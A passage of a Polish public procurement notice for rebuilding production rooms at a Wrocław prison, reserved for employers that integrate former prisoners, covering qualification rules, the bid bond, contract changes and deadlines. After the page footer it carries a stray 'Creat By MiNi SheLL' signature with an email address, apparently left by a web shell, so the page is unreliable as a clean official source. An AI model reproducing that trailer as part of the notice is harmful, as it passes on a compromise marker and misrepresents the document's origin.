Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie. Zamawiający nie dokona oceny spełnienia warunków udziału w postępowaniu.<br/> 21.1.4 zdolności technicznej lub zawodowej, <br/>Opis spełnienia warunku: <br/>Posiadania wykazu robót budowlanych wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej dwie roboty o zakresie ogólnobudowlanym, o wartości nie mniejszej niż 500 000,00 zł brutto każda oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czy dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny<br/>o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wzór wykazu stanowi załącznik nr 8 do SWZ.<br/> 21.2 Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu, polegać na zdolnościach technicznych lub zawodowych lub sytuacji ekonomicznej lub finansowej podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. <br/> 21.3 W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych<br/>lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi,<br/>do realizacji których te zdolności są wymagane.<br/> 21.4 Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z wnioskiem o dopuszczenie do udziału w postępowaniu albo odpowiednio wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby<br/>do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/> 21.5 Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. 3, potwierdza, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/> 21.5.1 zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/> 21.5.2 sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; <br/> 21.5.3 czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/> 21.6 Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa<br/>lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w art. 112 ust. 2 pkt 3 i 4 ustawy, oraz, jeżeli<br/>to dotyczy, kryteriów selekcji, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy.<br/> 21.7 Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie<br/>z Wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/> 21.8 Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu. <br/> 21.9 Wykonawca nie może, po upływie terminu składania wniosków o dopuszczenie<br/>do udziału w postępowaniu albo ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania wniosków<br/>o dopuszczenie do udziału w postępowaniu albo ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby. <br/> 21.10 Zgodnie z art. 94 ust. 1 pkt 5 ustawy z dnia 11 września 2019 r. -Prawo zamówień<br/>publicznych – o udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy<br/>mający status zakładu pracy chronionej, spółdzielnie socjalne oraz inni wykonawcy, których głównym celem lub głównym celem działalności ich wyodrębnionych<br/>organizacyjnie jednostek, które będą realizowały zamówienie, jest społeczna<br/>i zawodowa integracja osób społecznie marginalizowanych – osób pozbawionych<br/>wolności lub zwalnianych z zakładów karnych, o których mowa w ustawie z dnia<br/>6 czerwca 1997 r. - Kodeks karny wykonawczy (Dz.U. z 2021 r. poz. 53 z późn. zm.), mających trudności w integracji ze środowiskiem. Minimalny procentowy wskaźnik zatrudnienia ww. osób musi wynosić 30%. Wykonawca wypełnia i składa wraz z ofertą załącznik nr 10 do SWZ – Oświadczenie Wykonawcy dotyczące procentowego<br/>wskaźnika zatrudnienia osób wskazanych w art. 94 ust. 1 pkt 5 ustawy Prawo zamówień publicznych. Załącznik nr 10 do SWZ wypełnia również każdy podwykonawca. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">22.1.3 Wykaz robót budowlanych wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy<br/>– w tym okresie co najmniej dwie roboty o zakresie ogólnobudowlanym<br/>o wartości nie mniejszej niż 500 000,00 zł brutto każda oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie,<br/>w szczególności informacji o tym czy roboty zostały wykonane zgodnie<br/>z przepisami prawa budowlanego i prawidłowo ukończone, przy czy dowodami,<br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – załącznikiem nr 8 do SWZ. <br/> 22.1.4 Wykaz osób uczestniczących w wykonywaniu zamówienia, posiadających odpowiednie wykształcenie i kwalifikacje zawodowe - załącznik nr 7 do SWZ.<br/> 22.1.5 Oświadczenie Wykonawcy dotyczące procentowego wskaźnika zatrudnienia osób wskazanych w art. 94 ust. 1 pkt 5 ustawy Prawo zamówień publicznych - załącznik nr 10 do SWZ (załącznik wypełniają również podwykonawcy).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">22.1.1 Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu Ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Z 2020 r. poz. 1076, 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 9 do SWZ.<br/> 22.1.2 informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust. 1 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 29.1 Zamawiający żąda wniesienia wadium w wysokości: 11 000,00 PLN.<br/> 29.2 Wadium może być wnoszone w jednej lub kilku następujących formach:<br/> 29.2.1 w pieniądzu - na rachunek bankowy Zamawiającego prowadzony w BGK<br/> nr 18 1130 1033 0018 8162 5720 0003 z opisem wadium do zamówienia: Realizacja zadania INWESTYCYJNEGO pn. „Przebudowa pomieszczeń obiektu nr 9 przeznaczonych na działalność produkcyjną wraz z infrastrukturą towarzyszącą<br/>w Zakładzie Karnym Nr 1 we Wrocławiu)” znak sprawy: D/Kw.2232.6.2021, przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje<br/>się termin uznania na rachunku Zamawiającego, <br/> 29.2.2 w gwarancji bankowej,<br/> 29.2.3 w gwarancji ubezpieczeniowej,<br/> 29.2.4 w poręczeniu udzielanym przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. <br/> 29.3 W przypadku wnoszenia wadium w formach określonych w punktach od 2) do 4) należy je złożyć w oryginale w postaci elektronicznej przy użyciu środków komunikacji elektronicznej (Platforma zakupowa).<br/> 29.4 Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa<br/>w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 12.7. W przypadku, kiedy ofertę składa kilka podmiotów występujących wspólnie, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/> 12.8. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonują poszczególni Wykonawcy.<br/> 12.9. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający dopuszcza możliwość udzielania zaliczek na poczet wykonania przedmiotu umowy<br/>na pisemny wniosek Wykonawcy. Szczegóły zaliczkowania wymagają sporządzenia odrębnego uzgodnienia. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień umowy w stosunku do treści oferty nie może stać w sprzeczności<br/>z przepisem art. 454 ustawy PZP i dopuszczalna jest w sytuacji gdy nie była możliwa do przewidzenia na etapie podpisania umowy. Zamawiający przewiduje możliwość zmian postanowień umowy <br/>w następujących sytuacjach, tj.: <br/> 1) wystąpienia siły wyższej, czyli zdarzenia, którego nie można było przewidzieć - maksymalny okres przesunięcia terminu zakończenia umowy będzie równy okresowi przerwy <br/>w świadczeniu usługi. Siła wyższa to zdarzenie zewnętrzne o obiektywnie małym stopniu prawdopodobieństwa pojawienia się zdarzenia w określonej sytuacji, <br/>a którego szkodliwe następstwo przy zastosowaniu współczesnej techniki uniemożliwia Wykonawcy wykonywanie części lub całości jego zobowiązań; <br/> 2) aktualizacji rozwiązań z uwagi na postęp technologiczny;<br/> 3) zaniechania wykonania zadania przez Zamawiającego w trakcie trwania niniejszej umowy, <br/>z przyczyn od niego niezależnych. <br/> 2. Ponadto Zamawiający przewiduje możliwość zmian postanowień niniejszej umowy, kiedy zmiana podyktowana jest w szczególności:<br/> 1) zmianą stanu prawnego, regulującego właściwość zamówienia;<br/> 2) zmianą stanu faktycznego, powodującego nieracjonalność lub niecelowość dalszej realizacji zamówienia;<br/> 3) działaniem siły wyższej, uniemożliwiającej realizację w części lub w całości zamówienia;<br/> 4) oczywistymi omyłkami rachunkowymi lub pisemnymi;<br/> 5) działaniem osób trzecich, za które żadna ze Stron nie ponosi odpowiedzialności.<br/> 3. Jeżeli zmiana przepisów prawa w okresie obowiązywania niniejszej umowy powodować będzie konieczność zmiany niniejszej umowy, strony dokonają niezwłocznie zmiany umowy w zakresie wymaganym przepisami, tj. w następujących sytuacjach:<br/> 1) gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa, w zakresie mającym wpływ na realizację przedmiotu umowy; <br/> 2) konieczności wprowadzenia zmian, będących następstwem zmian wprowadzonych<br/>w umowach pomiędzy Zamawiającym a innymi niż Wykonawca stronami;<br/> 3) zmian wynikających z okoliczności, których nie można było przewidzieć w dniu zawarcia umowy, a są one korzystne dla Zamawiającego; <br/> 4) zmian osób reprezentujących strony w przypadku zmian organizacyjnych; <br/> 5) oraz w innych przypadkach określonych w niniejszej umowie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy złożyć na pomocą dedykowanej platformy - https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-16 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-13</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-02 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com